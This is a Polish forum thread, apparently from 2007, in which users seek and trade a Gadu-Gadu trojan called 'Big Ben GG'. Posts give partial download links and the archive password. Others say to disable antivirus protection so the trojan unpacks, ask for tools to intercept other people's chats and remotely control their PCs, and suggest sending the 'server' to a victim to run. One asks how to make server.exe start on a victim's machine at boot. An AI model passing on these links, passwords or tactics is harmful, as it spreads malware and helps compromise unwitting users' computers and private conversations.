!!NEW!! BiG BeN GG v.2.2

Status
Zamknięty.

wojteksg

Użytkownik
Dołączył
Grudzień 29, 2006
Posty
52
To się nie wymondrzaj jak nie masz o tym pojęcia. Napisłem że chodzi o najnowszego Bena. Karzdy używa google, a ja niejestem znawcą tematu tylko kiedyś się tym interesowałem i troche wiem na ten temat a ty nimasz o tym bladego pojęcia i chcesz pouczać innych, jesteś śmieszny niektórzy już tacy śa że nawet gdy czegoś niewiedzą i tak muszą się na ten temat wypowiedzieć (zwykle myląc się). :hahaha:
KONIEC TEJ SPRZECZKI. :heej:
 

Murdzi

Użytkownik
Dołączył
Styczeń 31, 2007
Posty
1
może wkoncu ktoś podac ten link bo ta kłótnia do niczego nie doprowadzi.... ten link z big ben gadu gadu 2.3 ma hasło.. ktoś zna?
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Originally posted by makos11
strona wygasla daj ktos swierzy link do big-ben gg 2.3

tyle jest tego na forum..

http://www.haker.com.pl/f...pic.php?t=22704

a tu download :

http://www.bobikrk.webd.p..._ben_gg_2_3.zip

mówie to już poraz któryś, na przyszłośc
<
nie wznawiaj starych tematów tylko poszukaj na forum.. bo pare tematów pod tym dałem linka z opisem i downloadem.
 

makos11

Użytkownik
Dołączył
Kwiecień 13, 2007
Posty
2
kur** a ja ci mowie te linki nie dzialaja jak bys mogl to daj dobry link a jak nie to to moje gg 6341362 i napisz mi haslo do archiwum plis!!! z gory dzieki :killer:
 

A520

Użytkownik
Dołączył
Maj 3, 2007
Posty
3
hasło

Potrzebne mi jest hasło do wersji 2.3 do archiwum
poda ktoś plis
gg:1420735
 

dioz

Użytkownik
Dołączył
Kwiecień 28, 2007
Posty
109
Ludzie czy was juz poj****......czytajcie temat od poczatku ku*** macie napisał do autora o hasło czyli do bobika wczesniej macie jego mail
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Originally posted by dioz
Ludzie czy was juz poj****......czytajcie temat od poczatku ku*** macie napisał do autora o hasło czyli do bobika wczesniej macie jego mail

Magia :

Kod:
))%mKa.fj{=I]<jgUlu!qQ0ISZIZ=fmBD$j1]w#y+(e@fk$2.>9XnF/BiGBeN
 

Presley

Użytkownik
Dołączył
Maj 6, 2007
Posty
5
Ludzie pomocy. na wstęp pisze!: ANTYWIRUSY ODINSTALOWANE ZAPORA Z WINDOWSA TEŻ.

nowyobraz2yu3.jpg

Każdego trojana którego chce rozpakować
<

Jak ktoś ma BIgBena to niech pośle na [email protected] k(kazdy pliczek) nie spakowane, bo inaczej chyba nie idzie. Nie wiem co mam zrobić zaraz mnie szlak trafi!
Z internet explorera też próbowałem to samo
<
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Originally posted by Presley
Ludzie pomocy. na wstęp pisze!: ANTYWIRUSY ODINSTALOWANE ZAPORA Z WINDOWSA TEŻ.

Obrazek
Każdego trojana którego chce rozpakować
<

Jak ktoś ma BIgBena to niech pośle na [email protected] k(kazdy pliczek) nie spakowane, bo inaczej chyba nie idzie. Nie wiem co mam zrobić zaraz mnie szlak trafi!
Z internet explorera też próbowałem to samo
<

Wyłącz ochrone antywirusa, w przypadku NOD32 jest to ochrona Imon.
 

Presley

Użytkownik
Dołączył
Maj 6, 2007
Posty
5
Już wiem co było powodem. Aplikacja Ad-aware ? ale dlaczego nie wiem, mniejsza oto. Chciałbym aby ktos mi zapodal linka do programu ktory jest prosty w obsludze, ktory przechwytuje rozmowy na gg. Prosze
smile.gif
 

Presley

Użytkownik
Dołączył
Maj 6, 2007
Posty
5
pobralem dantona 4.3,ale jak wpisuje ip kogos to pisze cos tam oops jakis error, a jak moj dam to od razu dziala. Niech ktośpomoże mi to skonfigurować

mniejsza oto. Chce tylko programik ktory otwiera cd roma komus zdalnie i wylancza kompa nic wiecej
smile.gif


[ Dodano: 06-05-2007, 16:58 ]
i dokładną instrukcje obsługi
 

Kanciastoporty

Były Moderator
Dołączył
Grudzień 19, 2006
Posty
1137
i ciastko z dziurka
wyslij komus server, niech go odpali
nikt ci instrukcji nie da, chyba ze ktos lubi pisac po 15 razy te same rzeczy (czytaj powstajace faq)
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
nie tylko ty
 

Presley

Użytkownik
Dołączył
Maj 6, 2007
Posty
5
dlaczego mi ten VSK nie działa? wszystko dobrze skondigurowałem, a gdy włanczam go to sier "nie instaluje" tak jak włączyłem w opcjach. A po drugie nic na ftp. nie wzuca ani maili nie wysyła (opcja bez gg)
 

necromaslak

Użytkownik
Dołączył
Maj 6, 2007
Posty
3
mam pytanko, jak zrobic zeby plik sever.exe otwieral sie u ofiary przy kazdym wlaczeniu kompa? z gory thx za odp
 
Status
Zamknięty.
Do góry Bottom